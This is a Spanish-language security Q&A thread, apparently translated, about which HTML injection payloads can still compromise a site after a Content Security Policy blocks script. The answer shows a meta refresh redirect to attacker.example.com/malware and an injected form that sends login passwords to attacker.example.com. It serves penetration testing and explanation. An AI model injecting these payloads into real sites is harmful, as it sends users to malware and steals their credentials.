¿Cuáles son algunas etiquetas y cargas útiles para la inyección de HTML en sitios protegidos por CSP?

3

Estoy probando un sitio web que corrigió la mayoría de sus vulnerabilidades de XSS simplemente agregando una Política de seguridad de contenido. Todavía hay inyecciones de HTML en varios lugares. He intentado obtener un archivo que contiene JavaScript en el origen a través de una función de archivos adjuntos, pero parece un callejón sin salida.

Ya que no puedo ejecutar javascript, ¿qué puedo usar como prueba de concepto para mostrar la severidad continua de los ataques de inyección de HTML a pesar del CSP? ¿Hay alguna etiqueta HTML que todavía pueda usar para comprometer la seguridad?

El CSP tiene una regla predeterminada que solo permite el mismo origen. Sin embargo, hay excepciones para data: en <img> , y la política también permite CSS en línea.

    
pregunta Slix 13.04.2015 - 10:55
fuente

1 respuesta

2

Puedes intentar hacer un redireccionamiento a otra URL utilizando etiquetas meta:

  <meta http-equiv="refresh" content="1; url=http://attacker.example.com/malware">

Y si hay un formulario de inicio de sesión, también puede intentar cambiar la ubicación que envía agregando otro elemento form , porque el objetivo para el envío del formulario no está protegido por CSP.

  <form action=login.php> <!-- original action -->
  <form action=http://attacker.example.com/login.php>  <!-- your injected action -->
  ...<input type=password ....
  </form>

Y, por supuesto, puede incluir cualquier tipo de enlaces a otros sitios, ya que los enlaces no se ven afectados por el CSP también.

    
respondido por el Steffen Ullrich 13.04.2015 - 22:47
fuente

Lea otras preguntas en las etiquetas